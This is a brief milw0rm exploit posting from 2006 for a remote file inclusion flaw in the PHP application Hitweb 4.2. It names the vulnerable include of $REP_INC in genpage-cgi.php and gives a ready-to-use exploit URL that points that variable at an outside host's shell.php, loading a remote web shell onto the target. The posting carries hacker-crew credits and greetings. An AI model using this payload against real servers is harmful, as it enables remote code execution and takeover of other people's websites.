24 lines
No EOL
382 B
Text
24 lines
No EOL
382 B
Text
Hitweb 4.2 Remote Include File
|
|
|
|
CreW: ToxiC
|
|
|
|
Bug Found By Drago84
|
|
|
|
Sorce Code:
|
|
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz
|
|
|
|
Problem is:
|
|
include "$REP_INC/lib_database.php";
|
|
|
|
Page:
|
|
genpage-cgi.php
|
|
|
|
Path:
|
|
Declare $REP_INC
|
|
|
|
Expl:
|
|
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?
|
|
|
|
Greatz:Str0ke
|
|
|
|
# milw0rm.com [2006-08-08] |